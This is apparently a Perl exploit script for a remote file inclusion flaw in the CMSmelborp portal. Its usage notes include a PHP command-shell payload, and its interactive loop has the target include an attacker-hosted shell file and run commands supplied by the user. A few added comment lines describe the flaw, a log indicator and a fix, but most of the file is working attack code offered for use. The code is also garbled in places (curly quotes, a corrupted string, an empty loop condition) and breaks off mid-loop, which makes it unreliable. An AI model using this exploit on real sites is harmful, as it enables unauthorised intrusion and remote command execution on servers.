1 #!/usr/bin/perl
2 ##
3 # Portal Name : CMSmelborp(user_standard.php) Remote File Inclusion Exploit
4 # Bug found by DeltahackingSecurityTEAM; code: Dr.Trojan & Dr.Pantagon
5 ##
6 # Download = http://superb-west.dl.sourceforge.net/sourceforge/cmsmelborp/CMSmelborp.zip
7 #
8 ##
9 # usage:
10 # perl CMSmelborp.pl <target> <cmd shell location> <cmd shell variable>
11 #
12 # perl CMSmelborp.pl http://[target]/[path]/includes http://site.com/cmd.txt cmd
13 #
14 # cmd shell example: <?passthru($_GET[cmd]);?>
15 #
16 # cmd shell variable: ($_GET[cmd]);
17 ##
18 # #
19 #Greetz: Dr.Trojan , Hiv++ , D_7j ,Vpc,Str0ke
20 #
21 # Contact:dr.trojan@deltahacking.net
22 ##
23 # Web Site: www.deltahacking.net (private) & www.deltahacking.ir (Public)
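24 # exploit: http://site.com/includes/user_standard.php?relative_root=http://yourshell/shell.txt?&
# note: going by the title and the URL above, the flaw is that user_standard.php builds an include path
# from the request-supplied relative_root (the PHP source is not shown here, so this is inferred).
# Requests to includes/user_standard.php whose relative_root value is a URL are the log indicator;
# the fix is to stop deriving include paths from request input and to keep remote URL includes disabled in PHP.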
25 ##
26
27 use LWP::UserAgent;
28 $Path = $ARGV[0];
29 $Pathtocmd = $ARGV[1];
30 $cmdv = $ARGV[2];
31 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
32 head();
33 while()
34 {
35 print "[shell] \__DOCTEXT__quot;;
36 while(<STDIN>)
37 {
38 $cmd=$_;
39 chomp($cmd);
40 $xpl = LWP::UserAgent−>new() or die;
41 $req = HTTP::Request−>new(GET =>$Path.’includes/user_standard.php?relative_root=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd)or die "\nCould Not
connect\n";
42 $res = $xpl−>request($req);
43 $return = $res−>content;
44 $return =~ tr/[\n]/[.......]/;
45 if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
46 elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
)
47 {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
48 elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
49 if($return =~ /(.*)/)
50
51 {
52 $finreturn = $1;
53 $finreturn=~ tr/[.......]/[\n]/;
54 print "\r\n$finreturn\n\r";
55